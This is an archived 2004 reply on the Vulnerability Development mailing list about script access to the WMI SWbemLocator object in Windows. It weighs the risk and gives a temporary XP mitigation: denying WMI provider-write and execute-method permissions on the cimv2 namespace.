Vulnerability Development mailing list archives

[SPAM] RE: WbemScripting.SWbemLocator - createobject allows... EVERYTHING!

From: "jasonk" <jasonk () bluedevel com>
Date: Fri, 5 Mar 2004 10:05:23 +1100

Hi Bartosz,

If you run as an administrator, and allow unrestricted ActiveX access, this
is no different to any other exploit.  If the activex was a trojan and you
allowed full scripted access, there is the same effect.

However I imagine this can be used with some crossing the boundaries to My
Computer, and then an attack effected much more easily than a "known file
location" vuln.

For a temporary fix, under xp:

Open Computer Management, Services and Applications-> right click WMI
Control, choose Properties.

Then, Deny "provider write" and "execute methods" for the cimv2 namespace.
This quite possibly WILL affect other applications on the computer, but
should prevent this from occuring.

Otherwise, I don't know enough about WMI to be able to say how to disable
certain applications.  Anyone help?

jasonk